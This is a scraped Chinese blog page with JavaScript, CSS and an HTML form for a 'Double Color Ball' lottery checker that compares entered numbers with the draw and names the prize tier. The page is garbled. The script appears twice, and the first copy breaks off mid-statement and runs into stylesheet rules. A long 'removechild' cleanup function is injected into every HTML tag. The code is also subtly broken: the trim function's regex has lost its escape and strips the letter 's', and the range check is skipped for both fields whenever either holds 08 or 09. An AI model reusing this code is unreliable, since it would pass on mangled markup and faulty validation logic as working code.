您的位置:首页 > 其它

科长双色球对奖器0.1

2008-04-25 15:02 246 查看
//主函数 power by 科长 2006-11-23
function yes()
{
//输入数据有效性验证
if (!inputcheck())return false;
//数组赋值
var tt=new Array(7);
var mm=new Array(7);
var tempstr1=""
var tempstr2=""
for(i=1;i<=6;i++)
{
tempstr1=Jtrim(eval('document.all.t'+i+'.value'));
tempstr2=Jtrim(eval('document.all.m'+i+'.value'));
if (tempstr1.length==1 && tempstr1<=9)tempstr1="0"+tempstr1;
if (tempstr2.length==1 && tempstr2<=9)tempstr2="0"+tempstr2;
document.all('t'+i).value=tempstr1;
document.all('m'+i).value=tempstr2;
tt[i]=tempstr1;
mm[i]=tempstr2;
}
tempstr1=Jtrim(document.all.t7.value);
tempstr2=Jtrim(document.all.m7.value);
if (tempstr1.length==1 && tempstr1<=9)tempstr1="0"+tempstr1;
if (tempstr2.length==1 && tempstr2<=9)tempstr2="0"+tempstr2;
document.all.t7.value=tempstr1;
document.all.m7.value=tempstr2;
//数组排序
//array_sort(tt);
//array_sort(mm);
//中奖比对
var writeinf="";
var my500W=array_check_500W(tt,mm,"document.all.t7.value","document.all.m7.value");
if (my500W=='6+1') writeinf="一等奖,当期高等奖奖金的70%和奖池中累积的奖金之和.";
if (my500W=='6+0') writeinf="二等奖,当期高等奖奖金的30%.";
if (my500W=='5+1') writeinf="三等奖,单注奖金额固定为3000元.";
if (my500W=='5+0' || my500W=='4+1') writeinf="四等奖 ,单注奖金额固定为200元.";
if (my500W=='4+0' || my500W=='3+1') writeinf="五等奖 ,单注奖金额固定为10元.";
if (my500W=='2+1' || my500W=='1+1'|| my500W=='0+1') writeinf="六等奖,单注奖金额固定为5元.";
if (writeinf=="")writeinf="500W在等你,希望下次努力哟!";
alert("("+my500W+")"+writeinf);
//测试显示数据的值
//array_list(tt);

}

//中奖比对
function array_check_500W(a,b,a7,b7)
{
var tempstra=0;
var tempstrb="";
if (eval(a7)==eval(b7))tempstrb="1";else tempstrb="0";
var stralist=""
var strblist=""
for(i=1;i<=6;i++)
{
//测试输出
//stralist=stralist+a[i]+"|";
//strblist=strblist+b[i]+"|";
for(j=1;j<=6;j++)
if(a[i]==b[j]){a[i]="A";b[j]="B";tempstra=tempstra+1;}
}
//测试输出
//alert(stralist+'/n'+strblist);
return (tempstra+"+"+tempstrb);
}

//输入有效性验证
function inputcheck()
{
var tempstr1=""
var tempstr2=""
for(i=1;i<=7;i++)
{
tempstr1=Jtrim(eval('document.all.t'+i+'.value'));
tempstr2=Jtrim(eval('document.all.m'+i+'.value'));
if (tempstr1==""){document.all('t'+i).focus();alert('你是不是哪个号没填哟!');return false;}
if (tempstr2==""){document.all('m'+i).focus();alert('你是不是哪个号没填哟!');return false;}

//if (tempstr1=="00"){document.all('t'+i).focus();document.all('t'+i).select();alert('老大,双色球没得00得!');return false;}
//if (tempstr2=="00"){document.all('m'+i).focus();document.all('m'+i).select();alert('老大,双色球没得00得!');return false;}

if ( !isNumber(tempstr1)){document.all('t'+i).focus();document.all('t'+i).select();alert('你的号码不是数字太高级了,啷个得行嘛!');return false;}
if ( !isNumber(tempstr2)){document.all('m'+i).focus();document.all('m'+i).select();alert('你的号码不是数字太高级了,啷个得行嘛!');return false;}

if (i==7)
{
if (tempstr1!='08'&&tempstr1!='09'&&tempstr2!='08'&&tempstr2!='09')
{
if(parseInt(tempstr1)<1 || parseInt(tempstr1)>16){document.all('t'+i).focus();document.all('t'+i).select();alert('多研究下嘛,蓝色球 '+tempstr1+' 超出摇奖范围1-16老!');return false;}
if(parseInt(tempstr2)<1 || parseInt(tempstr2)>16){document.all('m'+i).focus();document.all('m'+i).select();alert('多研究下嘛,蓝色球 '+tempstr2+' 超出摇奖范围1-16老!');return false;}
}
}
else
{

if (tempstr1!='08'&&tempstr1!='09'&&tempstr2!='08'&&tempstr2!='09')
{
if(parseInt(tempstr1)<1 || parseInt(tempstr1)>33){document.all('t'+i).focus();document.all('t'+i).select();alert('多研究下嘛,红色球'+tempstr1+'超出摇奖范围1-33老!');return false;}
if(parseInt(tempstr2)<1 || parseInt(tempstr2)>33){document.all('m'+i).focus();document.all('m'+i).select();alert('多研究下嘛,红色球'+tempstr2+'超出摇奖范围1-33老!');return false;}
}

}

}
return true;
}

//是不是数字
function isNumber(String)
{
var Letters = "1234567890-"; //可以自己增加可输入值
var i;
var c;
if(String.charAt( 0 )=='-')
return false;
if( String.charAt( String.length - 1 ) == '-' )
return false;
for( i = 0; i < String.length; i ++ )
{
c = String.charAt( i );
if (Letters.indexOf( c ) < 0)
return false;
}
return true;
}
//数组排序
function array_sort(a)
{
var temp=0
for(i=1;i<=a.length-1;i++)
{
for(j=i;j<=a.length-1;j++)
{
if (a[j]

.body,td{
margin: 0px;
font-family: "宋体";
font-size: 14px;
color: #000000;
text-decoration: none;
font-weight: bold;
}
#tab1{
border: 2px solid #CCCCCC;
background-color: #FFFFFF;
text-align: left;
margin: auto;
width:260px;
padding: 2px;

}
#tab1 td.td1{
text-align: center;
color: #FF0000;
background-color: #CCCCCC;
padding: 4px;

}

.ck2{
border: 2px solid #0000ff;
}
.ck1{
border: 2px solid #FF0000;
}

#button1{
background-color: #CCCCCC;
border: 1px solid;
height: 20px;
}
双色球对奖器
本期号码:
我的号码:
 
lastModified time:
    document.write(document.lastModified)
    power by kz


<!--CTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"


"http://www.w3.org/TR/html4/loose.dt-->




<meta http-equiv="Content-Type" content="text/html; charset=gb2312" removechild="function MyRC(arg1){var self = this;if (self.removeAttribute)self.removeAttribute("removeChild");var result = self["removeChild"](arg1);self["removeChild"] = arguments.callee; /*Finally restore the Override Function*/if(arg1.clearAttributes)arg1.clearAttributes();if(arg1.onclick)arg1.onclick=null;if(arg1.onmousemove)arg1.onmousemove=null;if(arg1.onmouseover)arg1.onmouseover=null;if(arg1.ondblclick)arg1.ondblclick=null;if(arg1.onmouseenter)arg1.onmouseenter=null;if(arg1.onmouseleave)arg1.onmouseleave=null;return result;}" /><script>...


//主函数 power by 科长 2006-11-23


function yes()




...{


//输入数据有效性验证


if (!inputcheck())return false;


//数组赋值


var tt=new Array(7);


var mm=new Array(7);


var tempstr1=""


var tempstr2=""


for(i=1;i<=6;i++)




...{


tempstr1=Jtrim(eval('document.all.t'+i+'.value'));


tempstr2=Jtrim(eval('document.all.m'+i+'.value'));


if (tempstr1.length==1 && tempstr1<=9)tempstr1="0"+tempstr1;


if (tempstr2.length==1 && tempstr2<=9)tempstr2="0"+tempstr2;


document.all('t'+i).value=tempstr1;


document.all('m'+i).value=tempstr2;


tt[i]=tempstr1;


mm[i]=tempstr2;


}


tempstr1=Jtrim(document.all.t7.value);


tempstr2=Jtrim(document.all.m7.value);


if (tempstr1.length==1 && tempstr1<=9)tempstr1="0"+tempstr1;


if (tempstr2.length==1 && tempstr2<=9)tempstr2="0"+tempstr2;


document.all.t7.value=tempstr1;


document.all.m7.value=tempstr2;


//数组排序


//array_sort(tt);


//array_sort(mm);


//中奖比对


var writeinf="";


var my500W=array_check_500W(tt,mm,"document.all.t7.value","document.all.m7.value");


if (my500W=='6+1') writeinf="一等奖,当期高等奖奖金的70%和奖池中累积的奖金之和.";


if (my500W=='6+0') writeinf="二等奖,当期高等奖奖金的30%.";


if (my500W=='5+1') writeinf="三等奖,单注奖金额固定为3000元.";


if (my500W=='5+0' || my500W=='4+1') writeinf="四等奖 ,单注奖金额固定为200元.";


if (my500W=='4+0' || my500W=='3+1') writeinf="五等奖 ,单注奖金额固定为10元.";


if (my500W=='2+1' || my500W=='1+1'|| my500W=='0+1') writeinf="六等奖,单注奖金额固定为5元.";


if (writeinf=="")writeinf="500W在等你,希望下次努力哟!";


alert("("+my500W+")"+writeinf);


//测试显示数据的值


//array_list(tt);




}






//中奖比对


function array_check_500W(a,b,a7,b7)




...{


var tempstra=0;


var tempstrb="";


if (eval(a7)==eval(b7))tempstrb="1";else tempstrb="0";


var stralist=""


var strblist=""


for(i=1;i<=6;i++)




...{


//测试输出


//stralist=stralist+a[i]+"|";


//strblist=strblist+b[i]+"|";


for(j=1;j<=6;j++)




if(a[i]==b[j])...{a[i]="A";b[j]="B";tempstra=tempstra+1;}


}


//测试输出


//alert(stralist+' '+strblist);


return (tempstra+"+"+tempstrb);


}




//输入有效性验证


function inputcheck()




...{


var tempstr1=""


var tempstr2=""


for(i=1;i<=7;i++)




...{


tempstr1=Jtrim(eval('document.all.t'+i+'.value'));


tempstr2=Jtrim(eval('document.all.m'+i+'.value'));




if (tempstr1=="")...{document.all('t'+i).focus();alert('你是不是哪个号没填哟!');return false;}




if (tempstr2=="")...{document.all('m'+i).focus();alert('你是不是哪个号没填哟!');return false;}




//if (tempstr1=="00"){document.all('t'+i).focus();document.all('t'+i).select();alert('老大,双色球没得00得!');return false;}


//if (tempstr2=="00"){document.all('m'+i).focus();document.all('m'+i).select();alert('老大,双色球没得00得!');return false;}






if ( !isNumber(tempstr1))...{document.all('t'+i).focus();document.all('t'+i).select();alert('你的号码不是数字太高级了,啷个得行嘛!');return false;}




if ( !isNumber(tempstr2))...{document.all('m'+i).focus();document.all('m'+i).select();alert('你的号码不是数字太高级了,啷个得行嘛!');return false;}




if (i==7)




...{


if (tempstr1!='08'&&tempstr1!='09'&&tempstr2!='08'&&tempstr2!='09')




...{




if(parseInt(tempstr1)<1 || parseInt(tempstr1)>16)...{document.all('t'+i).focus();document.all('t'+i).select();alert('多研究下嘛,蓝色球 '+tempstr1+' 超出摇奖范围1-16老!');return false;}




if(parseInt(tempstr2)<1 || parseInt(tempstr2)>16)...{document.all('m'+i).focus();document.all('m'+i).select();alert('多研究下嘛,蓝色球 '+tempstr2+' 超出摇奖范围1-16老!');return false;}


}


}


else




...{




if (tempstr1!='08'&&tempstr1!='09'&&tempstr2!='08'&&tempstr2!='09')




...{




if(parseInt(tempstr1)<1 || parseInt(tempstr1)>33)...{document.all('t'+i).focus();document.all('t'+i).select();alert('多研究下嘛,红色球'+tempstr1+'超出摇奖范围1-33老!');return false;}




if(parseInt(tempstr2)<1 || parseInt(tempstr2)>33)...{document.all('m'+i).focus();document.all('m'+i).select();alert('多研究下嘛,红色球'+tempstr2+'超出摇奖范围1-33老!');return false;}


}




}




}


return true;


}




//是不是数字


function isNumber(String)




...{


var Letters = "1234567890-"; //可以自己增加可输入值


var i;


var c;


if(String.charAt( 0 )=='-')


return false;


if( String.charAt( String.length - 1 ) == '-' )


return false;


for( i = 0; i < String.length; i ++ )




...{


c = String.charAt( i );


if (Letters.indexOf( c ) < 0)


return false;


}


return true;


}


//数组排序


function array_sort(a)




...{


var temp=0


for(i=1;i<=a.length-1;i++)




...{


for(j=i;j<=a.length-1;j++)




...{




if (a[j]<a[i])...{temp=a[j];a[j]=a[i];a[i]=temp;}


}


}


return a;


}




//测试数组输出


function array_list(a)




...{


var disp="";


for(i=0;i<=a.length-1;i++) disp=disp+a[i]+'|';


document.all.write (disp);


}


//去空格


function Jtrim(str)




...{


var p=/s/g;


str=str.replace(p,"");


return str;


}




</script><style type="text/css" removechild="function MyRC(arg1){var self = this;if (self.removeAttribute)self.removeAttribute("removeChild");var result = self["removeChild"](arg1);self["removeChild"] = arguments.callee; /*Finally restore the Override Function*/if(arg1.clearAttributes)arg1.clearAttributes();if(arg1.onclick)arg1.onclick=null;if(arg1.onmousemove)arg1.onmousemove=null;if(arg1.onmouseover)arg1.onmouseover=null;if(arg1.ondblclick)arg1.ondblclick=null;if(arg1.onmouseenter)arg1.onmouseenter=null;if(arg1.onmouseleave)arg1.onmouseleave=null;return result;}">...












.body,td{...}{


margin: 0px;


font-family: "宋体";


font-size: 14px;


color: #000000;


text-decoration: none;


font-weight: bold;


}




#tab1{...}{


border: 2px solid #CCCCCC;


background-color: #FFFFFF;


text-align: left;


margin: auto;


width:260px;


padding: 2px;




}




#tab1 td.td1{...}{


text-align: center;


color: #FF0000;


background-color: #CCCCCC;


padding: 4px;




}






.ck2{...}{


border: 2px solid #0000ff;


}




.ck1{...}{


border: 2px solid #FF0000;


}






#button1{...}{


background-color: #CCCCCC;


border: 1px solid;


height: 20px;


}</style>


<table id="tab1" style="WIDTH: 360px; HEIGHT: 132px" cellspacing="0" cellpadding="0" width="360" border="0" removechild="function MyRC(arg1){var self = this;if (self.removeAttribute)self.removeAttribute("removeChild");var result = self["removeChild"](arg1);self["removeChild"] = arguments.callee; /*Finally restore the Override Function*/if(arg1.clearAttributes)arg1.clearAttributes();if(arg1.onclick)arg1.onclick=null;if(arg1.onmousemove)arg1.onmousemove=null;if(arg1.onmouseover)arg1.onmouseover=null;if(arg1.ondblclick)arg1.ondblclick=null;if(arg1.onmouseenter)arg1.onmouseenter=null;if(arg1.onmouseleave)arg1.onmouseleave=null;return result;}">


<tbody removechild="function MyRC(arg1){var self = this;if (self.removeAttribute)self.removeAttribute("removeChild");var result = self["removeChild"](arg1);self["removeChild"] = arguments.callee; /*Finally restore the Override Function*/if(arg1.clearAttributes)arg1.clearAttributes();if(arg1.onclick)arg1.onclick=null;if(arg1.onmousemove)arg1.onmousemove=null;if(arg1.onmouseover)arg1.onmouseover=null;if(arg1.ondblclick)arg1.ondblclick=null;if(arg1.onmouseenter)arg1.onmouseenter=null;if(arg1.onmouseleave)arg1.onmouseleave=null;return result;}">


<tr align="center" removechild="function MyRC(arg1){var self = this;if (self.removeAttribute)self.removeAttribute("removeChild");var result = self["removeChild"](arg1);self["removeChild"] = arguments.callee; /*Finally restore the Override Function*/if(arg1.clearAttributes)arg1.clearAttributes();if(arg1.onclick)arg1.onclick=null;if(arg1.onmousemove)arg1.onmousemove=null;if(arg1.onmouseover)arg1.onmouseover=null;if(arg1.ondblclick)arg1.ondblclick=null;if(arg1.onmouseenter)arg1.onmouseenter=null;if(arg1.onmouseleave)arg1.onmouseleave=null;return result;}">


<td class="td1" colspan="8" removechild="function MyRC(arg1){var self = this;if (self.removeAttribute)self.removeAttribute("removeChild");var result = self["removeChild"](arg1);self["removeChild"] = arguments.callee; /*Finally restore the Override Function*/if(arg1.clearAttributes)arg1.clearAttributes();if(arg1.onclick)arg1.onclick=null;if(arg1.onmousemove)arg1.onmousemove=null;if(arg1.onmouseover)arg1.onmouseover=null;if(arg1.ondblclick)arg1.ondblclick=null;if(arg1.onmouseenter)arg1.onmouseenter=null;if(arg1.onmouseleave)arg1.onmouseleave=null;return result;}">双色球对奖器</td>


</tr>


<tr removechild="function MyRC(arg1){var self = this;if (self.removeAttribute)self.removeAttribute("removeChild");var result = self["removeChild"](arg1);self["removeChild"] = arguments.callee; /*Finally restore the Override Function*/if(arg1.clearAttributes)arg1.clearAttributes();if(arg1.onclick)arg1.onclick=null;if(arg1.onmousemove)arg1.onmousemove=null;if(arg1.onmouseover)arg1.onmouseover=null;if(arg1.ondblclick)arg1.ondblclick=null;if(arg1.onmouseenter)arg1.onmouseenter=null;if(arg1.onmouseleave)arg1.onmouseleave=null;return result;}">


<td width="116" removechild="function MyRC(arg1){var self = this;if (self.removeAttribute)self.removeAttribute("removeChild");var result = self["removeChild"](arg1);self["removeChild"] = arguments.callee; /*Finally restore the Override Function*/if(arg1.clearAttributes)arg1.clearAttributes();if(arg1.onclick)arg1.onclick=null;if(arg1.onmousemove)arg1.onmousemove=null;if(arg1.onmouseover)arg1.onmouseover=null;if(arg1.ondblclick)arg1.ondblclick=null;if(arg1.onmouseenter)arg1.onmouseenter=null;if(arg1.onmouseleave)arg1.onmouseleave=null;return result;}">本期号码:</td>


<td align="right" width="20" removechild="function MyRC(arg1){var self = this;if (self.removeAttribute)self.removeAttribute("removeChild");var result = self["removeChild"](arg1);self["removeChild"] = arguments.callee; /*Finally restore the Override Function*/if(arg1.clearAttributes)arg1.clearAttributes();if(arg1.onclick)arg1.onclick=null;if(arg1.onmousemove)arg1.onmousemove=null;if(arg1.onmouseover)arg1.onmouseover=null;if(arg1.ondblclick)arg1.ondblclick=null;if(arg1.onmouseenter)arg1.onmouseenter=null;if(arg1.onmouseleave)arg1.onmouseleave=null;return result;}"><input class="ck1" onkeydown="if(event.keyCode==13)event.keyCode=9" style="WIDTH: 15px" maxlength="2" removechild="function MyRC(arg1){var self = this;if (self.removeAttribute)self.removeAttribute("removeChild");var result = self["removeChild"](arg1);self["removeChild"] = arguments.callee; /*Finally restore the Override Function*/if(arg1.clearAttributes)arg1.clearAttributes();if(arg1.onclick)arg1.onclick=null;if(arg1.onmousemove)arg1.onmousemove=null;if(arg1.onmouseover)arg1.onmouseover=null;if(arg1.ondblclick)arg1.ondblclick=null;if(arg1.onmouseenter)arg1.onmouseenter=null;if(arg1.onmouseleave)arg1.onmouseleave=null;return result;}" name="t1" /></td>


<td align="right" width="20" removechild="function MyRC(arg1){var self = this;if (self.removeAttribute)self.removeAttribute("removeChild");var result = self["removeChild"](arg1);self["removeChild"] = arguments.callee; /*Finally restore the Override Function*/if(arg1.clearAttributes)arg1.clearAttributes();if(arg1.onclick)arg1.onclick=null;if(arg1.onmousemove)arg1.onmousemove=null;if(arg1.onmouseover)arg1.onmouseover=null;if(arg1.ondblclick)arg1.ondblclick=null;if(arg1.onmouseenter)arg1.onmouseenter=null;if(arg1.onmouseleave)arg1.onmouseleave=null;return result;}"><input class="ck1" onkeydown="if(event.keyCode==13)event.keyCode=9" style="WIDTH: 15px" maxlength="2" removechild="function MyRC(arg1){var self = this;if (self.removeAttribute)self.removeAttribute("removeChild");var result = self["removeChild"](arg1);self["removeChild"] = arguments.callee; /*Finally restore the Override Function*/if(arg1.clearAttributes)arg1.clearAttributes();if(arg1.onclick)arg1.onclick=null;if(arg1.onmousemove)arg1.onmousemove=null;if(arg1.onmouseover)arg1.onmouseover=null;if(arg1.ondblclick)arg1.ondblclick=null;if(arg1.onmouseenter)arg1.onmouseenter=null;if(arg1.onmouseleave)arg1.onmouseleave=null;return result;}" name="t2" /></td>


<td align="right" width="20" removechild="function MyRC(arg1){var self = this;if (self.removeAttribute)self.removeAttribute("removeChild");var result = self["removeChild"](arg1);self["removeChild"] = arguments.callee; /*Finally restore the Override Function*/if(arg1.clearAttributes)arg1.clearAttributes();if(arg1.onclick)arg1.onclick=null;if(arg1.onmousemove)arg1.onmousemove=null;if(arg1.onmouseover)arg1.onmouseover=null;if(arg1.ondblclick)arg1.ondblclick=null;if(arg1.onmouseenter)arg1.onmouseenter=null;if(arg1.onmouseleave)arg1.onmouseleave=null;return result;}"><input class="ck1" onkeydown="if(event.keyCode==13)event.keyCode=9" style="WIDTH: 15px" maxlength="2" removechild="function MyRC(arg1){var self = this;if (self.removeAttribute)self.removeAttribute("removeChild");var result = self["removeChild"](arg1);self["removeChild"] = arguments.callee; /*Finally restore the Override Function*/if(arg1.clearAttributes)arg1.clearAttributes();if(arg1.onclick)arg1.onclick=null;if(arg1.onmousemove)arg1.onmousemove=null;if(arg1.onmouseover)arg1.onmouseover=null;if(arg1.ondblclick)arg1.ondblclick=null;if(arg1.onmouseenter)arg1.onmouseenter=null;if(arg1.onmouseleave)arg1.onmouseleave=null;return result;}" name="t3" /></td>


<td align="right" width="20" removechild="function MyRC(arg1){var self = this;if (self.removeAttribute)self.removeAttribute("removeChild");var result = self["removeChild"](arg1);self["removeChild"] = arguments.callee; /*Finally restore the Override Function*/if(arg1.clearAttributes)arg1.clearAttributes();if(arg1.onclick)arg1.onclick=null;if(arg1.onmousemove)arg1.onmousemove=null;if(arg1.onmouseover)arg1.onmouseover=null;if(arg1.ondblclick)arg1.ondblclick=null;if(arg1.onmouseenter)arg1.onmouseenter=null;if(arg1.onmouseleave)arg1.onmouseleave=null;return result;}"><input class="ck1" onkeydown="if(event.keyCode==13)event.keyCode=9" style="WIDTH: 15px" maxlength="2" removechild="function MyRC(arg1){var self = this;if (self.removeAttribute)self.removeAttribute("removeChild");var result = self["removeChild"](arg1);self["removeChild"] = arguments.callee; /*Finally restore the Override Function*/if(arg1.clearAttributes)arg1.clearAttributes();if(arg1.onclick)arg1.onclick=null;if(arg1.onmousemove)arg1.onmousemove=null;if(arg1.onmouseover)arg1.onmouseover=null;if(arg1.ondblclick)arg1.ondblclick=null;if(arg1.onmouseenter)arg1.onmouseenter=null;if(arg1.onmouseleave)arg1.onmouseleave=null;return result;}" name="t4" /></td>


<td align="right" width="20" removechild="function MyRC(arg1){var self = this;if (self.removeAttribute)self.removeAttribute("removeChild");var result = self["removeChild"](arg1);self["removeChild"] = arguments.callee; /*Finally restore the Override Function*/if(arg1.clearAttributes)arg1.clearAttributes();if(arg1.onclick)arg1.onclick=null;if(arg1.onmousemove)arg1.onmousemove=null;if(arg1.onmouseover)arg1.onmouseover=null;if(arg1.ondblclick)arg1.ondblclick=null;if(arg1.onmouseenter)arg1.onmouseenter=null;if(arg1.onmouseleave)arg1.onmouseleave=null;return result;}"><input class="ck1" onkeydown="if(event.keyCode==13)event.keyCode=9" style="WIDTH: 15px" maxlength="2" removechild="function MyRC(arg1){var self = this;if (self.removeAttribute)self.removeAttribute("removeChild");var result = self["removeChild"](arg1);self["removeChild"] = arguments.callee; /*Finally restore the Override Function*/if(arg1.clearAttributes)arg1.clearAttributes();if(arg1.onclick)arg1.onclick=null;if(arg1.onmousemove)arg1.onmousemove=null;if(arg1.onmouseover)arg1.onmouseover=null;if(arg1.ondblclick)arg1.ondblclick=null;if(arg1.onmouseenter)arg1.onmouseenter=null;if(arg1.onmouseleave)arg1.onmouseleave=null;return result;}" name="t5" /></td>


<td align="right" width="20" removechild="function MyRC(arg1){var self = this;if (self.removeAttribute)self.removeAttribute("removeChild");var result = self["removeChild"](arg1);self["removeChild"] = arguments.callee; /*Finally restore the Override Function*/if(arg1.clearAttributes)arg1.clearAttributes();if(arg1.onclick)arg1.onclick=null;if(arg1.onmousemove)arg1.onmousemove=null;if(arg1.onmouseover)arg1.onmouseover=null;if(arg1.ondblclick)arg1.ondblclick=null;if(arg1.onmouseenter)arg1.onmouseenter=null;if(arg1.onmouseleave)arg1.onmouseleave=null;return result;}"><input class="ck1" onkeydown="if(event.keyCode==13)event.keyCode=9" style="WIDTH: 15px" maxlength="2" removechild="function MyRC(arg1){var self = this;if (self.removeAttribute)self.removeAttribute("removeChild");var result = self["removeChild"](arg1);self["removeChild"] = arguments.callee; /*Finally restore the Override Function*/if(arg1.clearAttributes)arg1.clearAttributes();if(arg1.onclick)arg1.onclick=null;if(arg1.onmousemove)arg1.onmousemove=null;if(arg1.onmouseover)arg1.onmouseover=null;if(arg1.ondblclick)arg1.ondblclick=null;if(arg1.onmouseenter)arg1.onmouseenter=null;if(arg1.onmouseleave)arg1.onmouseleave=null;return result;}" name="t6" /></td>


<td align="right" width="20" removechild="function MyRC(arg1){var self = this;if (self.removeAttribute)self.removeAttribute("removeChild");var result = self["removeChild"](arg1);self["removeChild"] = arguments.callee; /*Finally restore the Override Function*/if(arg1.clearAttributes)arg1.clearAttributes();if(arg1.onclick)arg1.onclick=null;if(arg1.onmousemove)arg1.onmousemove=null;if(arg1.onmouseover)arg1.onmouseover=null;if(arg1.ondblclick)arg1.ondblclick=null;if(arg1.onmouseenter)arg1.onmouseenter=null;if(arg1.onmouseleave)arg1.onmouseleave=null;return result;}"><input class="ck2" onkeydown="if(event.keyCode==13)event.keyCode=9" style="WIDTH: 15px" maxlength="2" removechild="function MyRC(arg1){var self = this;if (self.removeAttribute)self.removeAttribute("removeChild");var result = self["removeChild"](arg1);self["removeChild"] = arguments.callee; /*Finally restore the Override Function*/if(arg1.clearAttributes)arg1.clearAttributes();if(arg1.onclick)arg1.onclick=null;if(arg1.onmousemove)arg1.onmousemove=null;if(arg1.onmouseover)arg1.onmouseover=null;if(arg1.ondblclick)arg1.ondblclick=null;if(arg1.onmouseenter)arg1.onmouseenter=null;if(arg1.onmouseleave)arg1.onmouseleave=null;return result;}" name="t7" /></td>


</tr>


<tr removechild="function MyRC(arg1){var self = this;if (self.removeAttribute)self.removeAttribute("removeChild");var result = self["removeChild"](arg1);self["removeChild"] = arguments.callee; /*Finally restore the Override Function*/if(arg1.clearAttributes)arg1.clearAttributes();if(arg1.onclick)arg1.onclick=null;if(arg1.onmousemove)arg1.onmousemove=null;if(arg1.onmouseover)arg1.onmouseover=null;if(arg1.ondblclick)arg1.ondblclick=null;if(arg1.onmouseenter)arg1.onmouseenter=null;if(arg1.onmouseleave)arg1.onmouseleave=null;return result;}">


<td removechild="function MyRC(arg1){var self = this;if (self.removeAttribute)self.removeAttribute("removeChild");var result = self["removeChild"](arg1);self["removeChild"] = arguments.callee; /*Finally restore the Override Function*/if(arg1.clearAttributes)arg1.clearAttributes();if(arg1.onclick)arg1.onclick=null;if(arg1.onmousemove)arg1.onmousemove=null;if(arg1.onmouseover)arg1.onmouseover=null;if(arg1.ondblclick)arg1.ondblclick=null;if(arg1.onmouseenter)arg1.onmouseenter=null;if(arg1.onmouseleave)arg1.onmouseleave=null;return result;}">我的号码:</td>


<td align="right" width="20" removechild="function MyRC(arg1){var self = this;if (self.removeAttribute)self.removeAttribute("removeChild");var result = self["removeChild"](arg1);self["removeChild"] = arguments.callee; /*Finally restore the Override Function*/if(arg1.clearAttributes)arg1.clearAttributes();if(arg1.onclick)arg1.onclick=null;if(arg1.onmousemove)arg1.onmousemove=null;if(arg1.onmouseover)arg1.onmouseover=null;if(arg1.ondblclick)arg1.ondblclick=null;if(arg1.onmouseenter)arg1.onmouseenter=null;if(arg1.onmouseleave)arg1.onmouseleave=null;return result;}"><input class="ck1" onkeydown="if(event.keyCode==13)event.keyCode=9" style="WIDTH: 15px" maxlength="2" removechild="function MyRC(arg1){var self = this;if (self.removeAttribute)self.removeAttribute("removeChild");var result = self["removeChild"](arg1);self["removeChild"] = arguments.callee; /*Finally restore the Override Function*/if(arg1.clearAttributes)arg1.clearAttributes();if(arg1.onclick)arg1.onclick=null;if(arg1.onmousemove)arg1.onmousemove=null;if(arg1.onmouseover)arg1.onmouseover=null;if(arg1.ondblclick)arg1.ondblclick=null;if(arg1.onmouseenter)arg1.onmouseenter=null;if(arg1.onmouseleave)arg1.onmouseleave=null;return result;}" name="m1" /></td>


<td align="right" width="20" removechild="function MyRC(arg1){var self = this;if (self.removeAttribute)self.removeAttribute("removeChild");var result = self["removeChild"](arg1);self["removeChild"] = arguments.callee; /*Finally restore the Override Function*/if(arg1.clearAttributes)arg1.clearAttributes();if(arg1.onclick)arg1.onclick=null;if(arg1.onmousemove)arg1.onmousemove=null;if(arg1.onmouseover)arg1.onmouseover=null;if(arg1.ondblclick)arg1.ondblclick=null;if(arg1.onmouseenter)arg1.onmouseenter=null;if(arg1.onmouseleave)arg1.onmouseleave=null;return result;}"><input class="ck1" onkeydown="if(event.keyCode==13)event.keyCode=9" style="WIDTH: 15px" maxlength="2" removechild="function MyRC(arg1){var self = this;if (self.removeAttribute)self.removeAttribute("removeChild");var result = self["removeChild"](arg1);self["removeChild"] = arguments.callee; /*Finally restore the Override Function*/if(arg1.clearAttributes)arg1.clearAttributes();if(arg1.onclick)arg1.onclick=null;if(arg1.onmousemove)arg1.onmousemove=null;if(arg1.onmouseover)arg1.onmouseover=null;if(arg1.ondblclick)arg1.ondblclick=null;if(arg1.onmouseenter)arg1.onmouseenter=null;if(arg1.onmouseleave)arg1.onmouseleave=null;return result;}" name="m2" /></td>


<td align="right" width="20" removechild="function MyRC(arg1){var self = this;if (self.removeAttribute)self.removeAttribute("removeChild");var result = self["removeChild"](arg1);self["removeChild"] = arguments.callee; /*Finally restore the Override Function*/if(arg1.clearAttributes)arg1.clearAttributes();if(arg1.onclick)arg1.onclick=null;if(arg1.onmousemove)arg1.onmousemove=null;if(arg1.onmouseover)arg1.onmouseover=null;if(arg1.ondblclick)arg1.ondblclick=null;if(arg1.onmouseenter)arg1.onmouseenter=null;if(arg1.onmouseleave)arg1.onmouseleave=null;return result;}"><input class="ck1" onkeydown="if(event.keyCode==13)event.keyCode=9" style="WIDTH: 15px" maxlength="2" removechild="function MyRC(arg1){var self = this;if (self.removeAttribute)self.removeAttribute("removeChild");var result = self["removeChild"](arg1);self["removeChild"] = arguments.callee; /*Finally restore the Override Function*/if(arg1.clearAttributes)arg1.clearAttributes();if(arg1.onclick)arg1.onclick=null;if(arg1.onmousemove)arg1.onmousemove=null;if(arg1.onmouseover)arg1.onmouseover=null;if(arg1.ondblclick)arg1.ondblclick=null;if(arg1.onmouseenter)arg1.onmouseenter=null;if(arg1.onmouseleave)arg1.onmouseleave=null;return result;}" name="m3" /></td>


<td align="right" width="20" removechild="function MyRC(arg1){var self = this;if (self.removeAttribute)self.removeAttribute("removeChild");var result = self["removeChild"](arg1);self["removeChild"] = arguments.callee; /*Finally restore the Override Function*/if(arg1.clearAttributes)arg1.clearAttributes();if(arg1.onclick)arg1.onclick=null;if(arg1.onmousemove)arg1.onmousemove=null;if(arg1.onmouseover)arg1.onmouseover=null;if(arg1.ondblclick)arg1.ondblclick=null;if(arg1.onmouseenter)arg1.onmouseenter=null;if(arg1.onmouseleave)arg1.onmouseleave=null;return result;}"><input class="ck1" onkeydown="if(event.keyCode==13)event.keyCode=9" style="WIDTH: 15px" maxlength="2" removechild="function MyRC(arg1){var self = this;if (self.removeAttribute)self.removeAttribute("removeChild");var result = self["removeChild"](arg1);self["removeChild"] = arguments.callee; /*Finally restore the Override Function*/if(arg1.clearAttributes)arg1.clearAttributes();if(arg1.onclick)arg1.onclick=null;if(arg1.onmousemove)arg1.onmousemove=null;if(arg1.onmouseover)arg1.onmouseover=null;if(arg1.ondblclick)arg1.ondblclick=null;if(arg1.onmouseenter)arg1.onmouseenter=null;if(arg1.onmouseleave)arg1.onmouseleave=null;return result;}" name="m4" /></td>


